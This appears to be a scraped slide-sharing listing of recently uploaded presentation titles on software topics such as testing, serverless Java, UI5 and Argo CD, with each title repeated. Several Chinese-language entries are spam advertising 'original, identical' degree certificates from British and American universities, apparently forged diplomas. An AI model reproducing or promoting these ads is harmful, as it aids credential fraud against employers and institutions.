Karya Keeper
 
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
gapen1
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Lecture 2 - software testing SE 412.pptx
Lecture 2 - software testing SE 412.pptxLecture 2 - software testing SE 412.pptx
Lecture 2 - software testing SE 412.pptx
TaghreedAltamimi
 
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
Bert Jan Schrijver
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
Peter Muessig
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
dakas1
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging  a  Tech AgencyPreparing Non - Technical Founders for Engaging  a  Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
ISH Technologies
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
rodomar2
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
Green Software Development
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
Rakesh Kumar R
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
Sven Peters
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
VALiNTRY360
 

Recently uploaded (20)

一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理一比一原版(USF毕业证)旧金山大学毕业证如何办理
一比一原版(USF毕业证)旧金山大学毕业证如何办理
 
14 th Edition of International conference on computer vision
14 th Edition of International conference on computer vision14 th Edition of International conference on computer vision
14 th Edition of International conference on computer vision
 
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
The Key to Digital Success_ A Comprehensive Guide to Continuous Testing Integ...
 
Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
 
SQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure MalaysiaSQL Accounting Software Brochure Malaysia
SQL Accounting Software Brochure Malaysia
 
Project Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdfProject Management: The Role of Project Dashboards.pdf
Project Management: The Role of Project Dashboards.pdf
 
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
如何办理(hull学位证书)英国赫尔大学毕业证硕士文凭原版一模一样
 
Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
 
Lecture 2 - software testing SE 412.pptx
Lecture 2 - software testing SE 412.pptxLecture 2 - software testing SE 412.pptx
Lecture 2 - software testing SE 412.pptx
 
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
J-Spring 2024 - Going serverless with Quarkus, GraalVM native images and AWS ...
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
 
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
一比一原版(UMN毕业证)明尼苏达大学毕业证如何办理
 
Preparing Non - Technical Founders for Engaging a Tech Agency
Preparing Non - Technical Founders for Engaging  a  Tech AgencyPreparing Non - Technical Founders for Engaging  a  Tech Agency
Preparing Non - Technical Founders for Engaging a Tech Agency
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfTop Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdf
 

Securing Your BBC Identity